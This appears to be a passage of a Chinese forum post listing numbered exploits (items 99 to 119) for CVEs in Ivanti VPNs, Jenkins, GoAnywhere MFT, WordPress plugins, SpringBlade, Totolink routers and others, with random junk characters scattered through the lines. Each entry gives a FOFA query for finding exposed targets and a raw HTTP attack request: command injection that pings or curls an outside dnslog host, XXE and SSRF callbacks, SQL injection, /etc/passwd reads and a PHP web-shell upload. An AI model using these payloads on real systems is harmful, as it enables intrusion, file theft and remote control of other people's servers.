& e) `7 ~, l& a q$ b; XX-Requested-With: XMLHttpRequest- l# w) h- d( K. N1 h
- B8 S; r. c% y4 t" N
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B3 U* s p) E; H1 b: p" a
) u0 n x) M V2 @' x
, a1 K& X5 M/ g99. Ncast盈可视高清智能录播系统busiFacade RCE; {* i: O: W; p
CVE-2024-0305( w3 v' [# \ c; J# V
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
, a9 r8 g1 z' ~2 A1 _ CPOST /classes/common/busiFacade.php HTTP/1.19 p! p f/ @+ w' F
Host: 192.168.40.130:80801 C# z" i# ]# v( l- v9 n) l4 t' x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0! ^0 V% w& a$ s6 y5 l9 _6 H
Connection: close" j4 r% `/ R* Y) a* b$ m8 B
Content-Length: 154% Q# h, ^: ]1 H+ r i
Accept: */*
- X1 o, L+ X2 S5 Q1 b3 {% IAccept-Encoding: gzip, deflate" G* P' J z9 ^2 {5 v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% W$ L) e! ?# r" x3 c, r
Content-Type: application/x-www-form-urlencoded; charset=UTF-87 x/ p. w- l) n1 g- ^5 O
X-Requested-With: XMLHttpRequest
* q: f% \8 {7 f
, \- l2 q8 p$ L' E%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D' m3 [4 ? i% I9 |* g9 Y
: u4 c2 _0 @" N) } M% X" y& @' L0 J0 f3 A' f$ W
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传/ _# u6 w$ t- L
CVE-2024-0352- b/ K& H4 g) ?& | Z8 x. `4 i
FOFA:icon_hash="874152924"" Y# A6 Y6 m3 Q, X
POST /api/file/formimage HTTP/1.1
! d, G5 u' a" aHost: 192.168.40.130
/ U! T) p. M. C/ n4 K* _User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
W* N9 a5 n# N3 O$ GConnection: close3 ~+ K: @5 Z5 ^; U9 }0 j
Content-Length: 2015 K/ i. ?1 [8 g- t
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
' L+ |2 o4 h8 M# j/ {0 K$ x6 ~) LAccept-Encoding: gzip& P& S3 Y9 `6 V1 D4 r' P
! b X4 I5 Z7 o7 c; P9 N! F; _------WebKitFormBoundarygcflwtei: Z* W9 N+ u1 q6 }
Content-Disposition: form-data; name="file";filename="IE4MGP.php"* k+ W5 q4 P1 `! e |2 M# a$ j
Content-Type: application/x-php
3 w) j$ Q6 D) i; p! p, `5 |1 F& {% l6 b% ~2 F$ S7 g
2ayyhRXiAsKXL8olvF5s4qqyI2O
3 x+ y( O. [0 P* R$ A; N. a------WebKitFormBoundarygcflwtei--6 \- R0 z9 a& t& [/ R
8 u1 j w! _% f* K1 B# l* @( i' R/ \: a7 z3 I1 \" R0 I
101. ivanti policy secure-22.6命令注入
2 s( K' q& ^# |( w! d' oCVE-2024-21887
8 k4 o$ I. x1 oFOFA:body="welcome.cgi?p=logo"
0 X! E5 g8 S2 K$ B8 P8 j4 XGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1" b, ^9 s& U" |8 l
Host: x.x.x.xx.x.x.x
# g' K* i* {. S. ?$ B0 JUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36: O/ x* N5 S# C1 |! a4 a
Connection: close+ H+ W% ?% R! z( ?5 `
Accept-Encoding: gzip3 @9 ~' @1 c# X' a4 h+ M
+ e; Z% Y: Q; t: L0 t& w2 q
, f/ ?4 |4 f! S. }: A/ U0 v; C102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行. [) m, j8 @: O P
CVE-2024-21893& X- G7 g- C/ ~" H
FOFA:body="welcome.cgi?p=logo"
' s h9 k. q8 d2 Q. N& X. VPOST /dana-ws/saml20.ws HTTP/1.1; {0 k; T" o% S8 p+ a4 ^
Host: x.x.x.x; T% S/ X2 r/ _+ e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36( _3 t, u* i8 h
Connection: close
0 T0 z5 ^' l& M! zContent-Length: 7922 G( ^. m. \2 |$ M) p2 w7 y( r
Accept-Encoding: gzip
7 e( V) U U. j( d8 E" x4 _2 w. K- @) w+ ?; I! E$ d( b5 M! [
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
& Q2 [0 H0 o8 Z+ S R0 T9 d* }: I7 o7 I0 `( {$ t- m
103. Ivanti Pulse Connect Secure VPN XXE/ u/ y6 b$ |2 x% D/ x2 M0 B
CVE-2024-22024+ b4 x6 y K% g/ B: [/ j
FOFA:body="welcome.cgi?p=logo"
% |' ~! r2 y \0 r7 A3 T4 s: ]POST /dana-na/auth/saml-sso.cgi HTTP/1.1; F7 h$ o( K' o: D7 O9 C/ A+ k
Host: 192.168.40.130:111* m. S2 W- W, Z
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.368 E6 W+ L* W4 Y4 j) p. f% e
Connection: close
5 P, h! Y! ~0 Q. fContent-Length: 204
; n, u, S( w, y# r6 N. r- GContent-Type: application/x-www-form-urlencoded
T* y+ g7 _5 p$ x1 gAccept-Encoding: gzip
4 r: Z2 I/ \4 c. o( _* w) M3 a$ G& f/ }" g$ o s @/ y
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
! X/ m7 l/ u0 d1 k3 m
/ ?" [9 y0 ^3 Q1 { C8 {
' S+ S/ e3 B* l/ q& k0 k其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
' E$ U! ^+ g1 C& l9 D2 |' b# q0 i<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>3 V: Q1 i8 m/ A7 O
5 O, i% ~& H. c! e5 Q# {( D a+ Z! M5 h) k8 @" N/ M
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露3 [* S/ F$ i( G
CVE-2024-0569
! I" e& G4 v) s0 v0 z0 Y* L4 XFOFA:title="TOTOLINK": M @/ H1 o1 M2 n
POST /cgi-bin/cstecgi.cgi HTTP/1.1+ \# x* q# s" @5 @
Host:192.168.0.1
' h, `! M. M. t% g2 p! I* W9 Q i) ?Content-Length:41( Q2 p9 Q/ y) t5 x4 d
Accept:application/json,text/javascript,*/*;q=0.01
! Y: V, R& R% A' ~3 e6 Y0 aX-Requested-with: XMLHttpRequest' N1 _3 y% V0 k- |2 @- p
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.368 T& r; ]# K; o+ \7 `8 ]
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
$ o% K8 `! C- U$ p: vOrigin: http://192.168.0.1
9 z6 s( R# M% S: sReferer: http://192.168.0.1/advance/index.html?time=16711523805642 p1 Z" ^8 W: W
Accept-Encoding:gzip,deflate. X' y/ V5 _3 H+ f# G
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
: [( f* v+ R8 E: @$ ?, cConnection:close
* N8 O4 R! N" n) l3 y/ H, t4 |) M \
{
' I5 ` L$ k7 |"topicurl":"getSysStatusCfg",8 p2 j- w3 B2 \) A; R# i
"token":""
( _$ p! T. I# ?: O2 J5 N( A4 e}1 k2 d. r9 p1 j( N6 h4 D. W4 Z
; l+ T7 c5 j" z
105. SpringBlade v3.2.0 export-user SQL 注入
! M$ E* T$ _. M/ \FOFA:body="https://bladex.vip" K) N) q3 `( u8 d. o+ ]# h
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
# M4 o# `+ j( j- w
4 t) V! m+ `1 E5 O) O4 x8 ]) ^, D4 @1 y106. SpringBlade dict-biz/list SQL 注入. K9 K- n& M2 Y
FOFA:body="Saber 将不能正常工作"( e9 d- m7 t9 q% l$ f
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.12 H j$ \' J; U3 N& x& U
Host: your-ip% R1 ?' Z4 V+ ~ [) ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 v; G K2 T2 x* S* Z1 jBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A L I, ?0 Z3 {# }% r
Accept-Encoding: gzip, deflate- L3 E9 d1 ^1 S1 h
Accept-Language: zh-CN,zh;q=0.9
5 C' h1 z, R/ W ?9 IConnection: close0 K1 w3 ^7 _# q$ j
/ W5 y; a; F8 H; |6 Y
! l. x3 X/ L5 L \107. SpringBlade tenant/list SQL 注入
" j- ^+ Z% V @4 U. u! `/ i8 nFOFA:body="https://bladex.vip"" @ |: \* y: I1 v
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.12 ]4 X$ c% {* ^" h0 p
Host: your-ip
: | U2 z& w! TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ _. m$ u1 V7 S6 y
Blade-Auth:替换为自己的
( ?' v( p% P; K7 w9 [# LConnection: close
5 ]$ u" Z7 ^3 L, U, C, `+ j( v% H/ B3 k, ^7 r* S
% t- {1 D- v. ?) g
108. D-Tale 3.9.0 SSRF
" j1 {% i5 o0 k) o% x2 P0 P; VCVE-2024-216422 C$ R3 N7 @; Z4 h
FOFA:"dtale/static/images/favicon.png"; l* h6 c) r( r! L
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
" f( C" v4 p9 K$ JHost: your-ip$ N0 P% F1 M) g0 ^, U
Accept: application/json, text/plain, */*; L2 z, C( i; i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.361 [3 V5 }! s( p* N* R9 X8 J( c
Accept-Encoding: gzip, deflate
* b1 _0 ?" E& bAccept-Language: zh-CN,zh;q=0.9,en;q=0.80 V- \$ _4 e9 m1 `9 [ V$ \
Connection: close1 q( M, P: @: a f1 q" }8 r1 ` G
0 U1 B+ [& H- ~2 f. z8 H; W
% ?/ ]6 `, `, C0 ~6 o. B+ C- g109. Jenkins CLI 任意文件读取
2 r4 y5 f: R7 {3 ]* iCVE-2024-23897
. v* I4 M% C, F9 E: r% ^1 [' ?( `& dFOFA:header="X-Jenkins" P! h8 z: q2 B
POST /cli?remoting=false HTTP/1.1
# B* z& M" J( U" V& Y) B$ }: AHost:" C) x0 [+ e6 I. D6 J0 e: ?
Content-type: application/octet-stream
& @* h# g$ k$ ?7 vSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
+ B1 h1 X- V. y$ c+ @8 j* PSide: upload
, e* x. F" S7 A/ [; `8 kConnection: keep-alive
. f0 |% D# V# Q+ m3 GContent-Length: 163
7 a* i+ C0 u! ?# T% z1 a
5 [ s& P- H4 T Ib'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03', `; T8 z1 l+ U
4 c$ d: ~4 S/ @- k
# B$ s" @) x. ^& o) ~6 K
POST /cli?remoting=false HTTP/1.1
5 C5 G6 b' P) r% T* {, w( M, }Host:
6 k# Q7 g7 d4 `; u, ?0 f+ r! T$ @& VSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92 |" j0 Y7 D( ~! @5 G8 n+ f' Q) I
download
* j7 I2 C, F( L* gContent-Type: application/x-www-form-urlencoded: T: @6 L, r# _ n2 f3 B
Content-Length: 0
- n- o, B2 l* N6 h0 k2 E2 f
3 t- Y' y- m" N9 {8 d5 p N; ]" O4 ~6 a
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
2 r9 E; A5 x, z& fjava -jar jenkins-cli.jar help9 p' Q) L8 q, v6 L w
[COMMAND]
; v, F$ ]0 T& w0 _# fLists all the available commands or a detailed description of single command.
! a( }% V( ^* ^6 z3 b, ? COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
1 Z% j% }$ G( M% K! x0 r! `1 A. x0 A- j1 ~) H
- X/ X& }( w( }8 j9 Q
110. Goanywhere MFT 未授权创建管理员% G; A/ F9 }6 I( B% }! x
CVE-2024-0204
' P) r+ L2 U/ |3 A' Z# aFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
+ d5 I" b) F7 }' o* U0 YGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1- a' V, G5 J+ }
Host: 192.168.40.130:8000
# B* _, ^1 r: ^* G" H) f; IUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36! {7 w3 g8 |# S* ]+ E/ P
Connection: close V! m" g. \* f+ s$ X* A8 E
Accept: */*
/ x! j3 n3 w) s1 a4 nAccept-Language: en
' k1 f1 A |' C% BAccept-Encoding: gzip5 {* Z4 Q! h: J( t2 I- u z- j* o
' X8 o. l. P: {$ A9 m) [
3 r7 B$ D y& x- U$ c4 }111. WordPress Plugin HTML5 Video Player SQL注入2 }: [7 z! ^; d2 c( S. A" } p
CVE-2024-1061
9 w d* d2 e0 j: T+ y# C( KFOFA:"wordpress" && body="html5-video-player"
9 T1 q l, ?. Z" QGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
+ X/ ^* ]( O8 S X" q! ~Host: 192.168.40.130:112
! c; K& E8 o4 c. ?# O% A0 AUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 k, L+ ^, p, ~. x3 X
Connection: close
5 V( j& @/ E9 pAccept: */*" p( z+ j3 }7 l* e+ o' p0 C
Accept-Language: en% m0 S; f2 H+ K# V' ~! k1 f
Accept-Encoding: gzip7 Q* t( E o& [! Y$ ?
: j' V6 [' e" H3 Z2 v7 H
% p' O7 H+ ~" K0 i
112. WordPress Plugin NotificationX SQL 注入% K0 W7 g2 [- @2 V! r6 g) c
CVE-2024-1698
5 h- O8 v; }( GFOFA:body="/wp-content/plugins/notificationx"
" h. U! S0 I; Y# S$ j# e+ g8 {* M+ l# NPOST /wp-json/notificationx/v1/analytics HTTP/1.1
) W+ A0 d& j+ _. D& U* Z9 KHost: {{Hostname}}8 P9 ^) _' L5 _$ b' Z
Content-Type: application/json
, a, g8 o7 d7 Y5 s7 M$ C5 X; t7 \: @; x' X' {3 @8 D* L, m
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
1 h0 o" } Z, L2 O0 `4 e) \4 @4 N
. E0 p a. G, A2 \) ?# e+ T
, N8 w* |1 f6 D7 b6 ?113. WordPress Automatic 插件任意文件下载和SSRF
$ G6 `7 X; w. K- ?9 I5 ?5 D- w4 kCVE-2024-27954' F6 a9 }( P" d B9 g: I1 o1 j
FOFA:"/wp-content/plugins/wp-automatic"1 }# I3 f2 w( W, x' @
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
1 y, {! B" n, c* n- hHost: x.x.x.x2 v6 r( O; `- Y3 Z
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
6 M: i( V& r: @6 H! V0 \Connection: close* ?5 Q% v1 |) d: Z o% X/ [ N% [
Accept: */*
& O# r6 S* V$ D% e; o5 b, eAccept-Language: en- p$ p9 W, @9 G1 U& Y; }- D2 n- m. g
Accept-Encoding: gzip3 j! O' C, K" w& h# {# y8 p1 a
6 N) Z% @" C" m, M
% n8 ]/ P, r3 Z* ?. H* z$ a0 t114. WordPress MasterStudy LMS插件 SQL注入, H5 u* ~7 i1 s! F; A, K2 b
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/") v( b }$ l, y8 \' D6 A z
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
7 a& I& O# d0 V0 v) I( lHost: your-ip Q, }: I d' c) N8 O& J* f0 S
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.360 W P, ]; w" v% Q- [
Accept-Charset: utf-8
/ H/ U7 ?+ b$ W- t: @; |6 r$ Q' WAccept-Encoding: gzip, deflate
+ B+ z+ T& ]7 g4 Y& Y1 @7 pConnection: close3 p- u L2 H8 k9 u/ @
! N t2 J2 e6 M: i1 Y6 V% L
6 z! B9 \) K( _115. WordPress Bricks Builder <= 1.9.6 RCE5 j. O, x- b; T* y
CVE-2024-256001 U% A# P. d9 t/ s- i3 x0 G) m
FOFA: body="/wp-content/themes/bricks/"
5 @0 _# K" Z: r5 }第一步,获取网站的nonce值) a) j2 e* P. p3 _0 Q/ ^0 `+ f0 C" v
GET / HTTP/1.1
# B3 K! A: n( O. u X3 T4 W- h# WHost: x.x.x.x
" A' `& ?$ F, a/ ~# u0 d' @ O$ VUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36/ i6 [; V1 O6 f' Z, o% d. a$ k! O
Connection: close
8 J# a' x" @' Z4 A6 IAccept-Encoding: gzip
, b x8 K4 y% }6 v. {8 m& x' Z# G( O Q e. k- Z
" ~ y0 s! m$ T6 d8 O% C/ b9 M% K
第二步替换nonce值,执行命令
% V" S, M4 _% h' A2 Y/ cPOST /wp-json/bricks/v1/render_element HTTP/1.1
: w+ o& f. g9 ]% X7 PHost: x.x.x.x8 R3 @! T. c% J( ~# v* e ~; x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
& h4 h3 L5 _1 X5 Q% SConnection: close
' q) H2 f0 j7 Z- P/ ?Content-Length: 356
$ ]% W7 n {' A+ CContent-Type: application/json) S" n9 |, c# u" g+ M. s: v. S
Accept-Encoding: gzip% Y0 u5 o/ o: G- z
+ Z6 Z4 F% H: n' d" p{
) ?/ L! D6 D9 g6 @6 n"postId": "1",% U7 U/ g$ u% d: e( ?
"nonce": "第一步获得的值",
' B5 L- w. n, l3 Q, @% r& v$ M "element": { t+ T! F, d) B- o6 Q
"name": "container",) }; D# Y# h1 u Z7 C
"settings": {
) P8 n: C- _8 Q4 K "hasLoop": "true",
6 N$ b% h$ Z/ z9 q9 k "query": {2 g: v8 H- {% Y+ g( g3 Z9 Z0 }
"useQueryEditor": true,
$ f; s$ |3 r0 {1 g1 t "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
5 t0 {5 \# C$ C! C& j6 ] "objectType": "post"
0 }& d4 ~9 i4 E6 O }" O% w8 o2 ~. y9 M# H+ S/ }+ d+ r y
}
8 A- F/ o9 p' U+ h! H0 x }4 X t1 V* f+ u6 d
}% @. b/ F5 s& u( ?
2 x/ x7 d1 {0 {; x4 M( X* t
( y' a/ d' z: d, h1 ^. [/ u
116. wordpress js-support-ticket文件上传9 c2 D9 w6 U* r# k# l+ |% I3 P
FOFA:body="wp-content/plugins/js-support-ticket"& z4 S4 _4 X$ X9 C" d: [# l
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1/ K u) ]3 z4 W! N9 r/ ]* l M" {9 `4 T
Host:" b3 v% @0 y. n9 ]/ X
Content-Type: multipart/form-data; boundary=--------767099171) d0 |$ L4 l/ u& S( F# W
User-Agent: Mozilla/5.0
: `- N4 M8 F6 i( L: R! X r7 s8 a8 p+ W4 {8 o9 U5 Y7 U6 F
----------767099171' {8 z/ a9 I8 _# i! G6 t# E
Content-Disposition: form-data; name="action"
, U" }5 d$ `" y/ Zconfiguration_saveconfiguration' ^1 `' _! R `* i) A4 S4 ~
----------767099171
5 ?) Z' Q+ o4 Q5 ZContent-Disposition: form-data; name="form_request"% H$ U# Y8 P0 M# @' y/ s; u: n
jssupportticket, ]2 G+ h" p4 W& F L! c5 V* O3 A
----------767099171
& z! ?" Z$ \: q( MContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"4 j' A; d8 h s1 J
Content-Type: image/png
$ N& ^' ^; r* J% K7 t* G: p* D2 f----------767099171--- f5 s9 V6 B/ P# D4 q7 ]
( I' R1 k$ H* A, a7 L& c
9 Q, U0 n& a% Y( b2 c! T117. WordPress LayerSlider插件SQL注入
. t3 k8 O+ ^$ f) n* }version:7.9.11 – 7.10.0
4 c% A3 d4 |3 S" B; e( yFOFA:body="/wp-content/plugins/LayerSlider/"
0 K$ r* @8 x$ A: B- w6 C$ B6 ^# JGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1: |6 l" ^- c: U
Host: your-ip
; S9 l& {, q* N2 O( E3 u# Z5 YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
' K' V3 ?* B3 P& e. Y, l1 _. b: C' ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& q; z0 j" O J+ j. CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 p" N0 m! x+ c5 `% K2 A
Accept-Encoding: gzip, deflate, br I! g- H- d0 M+ ?/ z. W! Y' z* f
Connection: close
& y; H8 ]1 u( x& f% xUpgrade-Insecure-Requests: 1) z: S- z; _/ U+ I
1 ~4 @) |5 L! |$ P- E; ]4 d3 M6 X8 Z6 @
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
1 W: Q L" j0 fCVE-2024-0939
( k$ O% X9 y, e$ V+ V- IFOFA:title="Smart管理平台"
0 G9 _; l) z2 Z5 ePOST /Tool/uploadfile.php? HTTP/1.1: M8 Z6 M5 m0 e
Host: 192.168.40.130:8443
1 I2 C: {7 a8 k' x" `, a4 n+ DCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
' D% ^' V7 b B2 `9 N" XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0( o. r, M* Z' y, t4 w+ W7 h0 G( A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& g9 F7 y+ d9 G1 x4 d( LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, t0 |8 k9 T4 H7 X; d3 FAccept-Encoding: gzip, deflate; Q" v: t' z0 Z: V, f
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887, k4 I6 ]9 _$ G) l3 I6 i
Content-Length: 405
) P. O) v1 Z6 e0 J+ |7 t' ~( U4 NOrigin: https://192.168.40.130:8443
$ F) _! F4 P9 X. I2 H D" B6 FReferer: https://192.168.40.130:8443/Tool/uploadfile.php2 w/ f/ e5 Z$ l0 f3 }8 {& u
Upgrade-Insecure-Requests: 17 g1 Q' U* k6 k) B6 e
Sec-Fetch-Dest: document
" l, x7 e$ p) x9 K: oSec-Fetch-Mode: navigate" f1 a" g7 G5 Y' @ a' g
Sec-Fetch-Site: same-origin
/ T( I, ?9 i3 K0 C$ l7 A( aSec-Fetch-User: ?1
4 o) W2 U, G: i" O0 `Te: trailers; z: F; w% f8 @8 a9 E
Connection: close; M- W% ^( E' s9 V8 V5 J
7 f* R* |( \) }+ F' b, H-----------------------------139797012227476466340371828873 z: H' y5 N7 p
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
4 w# L3 T- p: U, vContent-Type: application/octet-stream
2 A- l D' G3 D9 ]( {: Z& e" ]" Q8 k s6 a( u: Q3 S9 e
<?php
, f$ ]$ _7 ^0 n! _system($_POST["passwd"]);( x/ f6 U- m9 C
?>
- [4 B6 `+ G& P$ l7 B! |-----------------------------13979701222747646634037182887
' S; S+ p) H: x9 ~( X" ]Content-Disposition: form-data; name="txt_path"! e- `' G9 B: ]! Y- L
8 v6 k" w3 u# }. ?+ a6 a% _) c
/home/src.php
, }0 O3 o$ C9 B# m R8 R-----------------------------13979701222747646634037182887--5 d" D: ^0 I7 R: i# F V
4 ]/ p- O% }8 @- \( A+ [" D2 ?2 W
2 {6 w2 x0 w/ }1 Z$ x K) A |6 i! }
访问/home/src.php3 M/ g7 U' O8 j/ N: U
! J8 W" w. ?4 f% f, T" U119. 北京百绰智能S20后台sysmanageajax.php sql注入
. l' T; S* \% f2 u0 `CVE-2024-12547 }) R8 N, l0 g. q+ `# B6 f
FOFA:title="Smart管理平台"
/ T* ^5 Y$ c" @ v! p, k先登录进入系统,默认账号密码为admin/admin
B1 E' Q$ v4 JPOST /sysmanage/sysmanageajax.php HTTP/1.11) _ F5 W7 [6 x- S: z& R& x; F( V
Host: x.x.x.x. v* _1 H3 V; p, t2 J
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
! I% d, u4 j+ UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
& s8 ]- d# o- x; G0 }Accept: */*
3 U1 g8 z, g; O2 d+ aAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) P* z3 L5 t" ~6 a/ h) J0 @$ I
Accept-Encoding: gzip, deflate) c7 l- @# w3 O8 `) a
Content-Type: application/x-www-form-urlencoded;! F4 K4 d+ [% F
Content-Length: 109. K- T: b' q' r, z9 E+ U
Origin: https://58.18.133.60:8443' W9 g- t# r6 l: ~, t* Z F
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
& w% |1 s! E$ B8 n; FSec-Fetch-Dest: empty
% B) O1 ^* W- f5 p; K. u* FSec-Fetch-Mode: cors o" F. _* L5 `: `9 Z* e/ @" f* ^
Sec-Fetch-Site: same-origin9 P) `! q& H! a) Q- C
X-Forwarded-For: 1.1.1.1' w: r, g' U6 ^5 o9 H' d9 l2 S
X-Originating-Ip: 1.1.1.1
) `7 U& b5 F# O# P4 aX-Remote-Ip: 1.1.1.1
9 J; M: g8 R! ~2 jX-Remote-Addr: 1.1.1.1! r6 A5 V4 _7 G+ O! k3 _
